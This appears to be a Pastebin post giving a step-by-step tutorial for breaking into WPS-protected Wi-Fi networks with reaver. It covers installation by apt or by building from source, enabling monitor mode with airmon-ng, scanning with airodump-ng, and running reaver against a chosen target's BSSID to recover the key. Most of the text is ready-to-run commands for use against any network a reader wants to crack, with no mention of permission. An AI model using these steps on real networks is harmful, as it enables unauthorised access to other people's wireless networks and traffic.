Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- The limitations of aircrack-ng is, its accuracy is very poor when working with WPS encrypted networks.
- For this purpose, we will be using a tool called "reaver" to crack WPS encrypted networks without the need of a wordlist or a dictionary attack.
- reaver is also included in the toolkit in Kali Linux.
- Requirements:
- -------------------------------------------------
- 1) Debian based linux distro ( for starters ), any other linux distro for advanced users.
- 2) aircrack-ng
- reaver Installation:
- ---------------------------------------------------
- If you use Ubuntu 13.04 or Higher (Including Mint):
- Open terminal and type:
- sudo apt-get install reaver
- For other Linux:
- Download reaver from here.
- https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
- Installation:
- Open Terminal Type:
- sudo su
- wget https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
- tar -xzvf reaver-1.4.tar.gz
- cd reaver-1.4/src
- ./configure
- make
- sudo make install
- ---------------------------------------------------------
- Now To Crack WPA Networks with reaver:
- ----------------------------------------------------------
- Open terminal type:
- sudo su
- (run as root)
- sudo airmon-ng start wlan0
- (enabling monitor mode on wireless card)
- airodump-ng mon0
- (scanning for wireless networks)
- --------------------------------------------------------------
- When you find the network you want to crack, press Ctrl + C to stop scanning.
- Copy the BSSID of the network.
- type in:
- reaver -i mon0 -b 11:22:33:44:55:66 -vv
- (note : replace 11:22:33:44:55:66 with the BSSID of the network you want to crack)
- Press enter, and sit back.. reaver will do the rest and show you the KEY.
Add Comment
Please, Sign In to add comment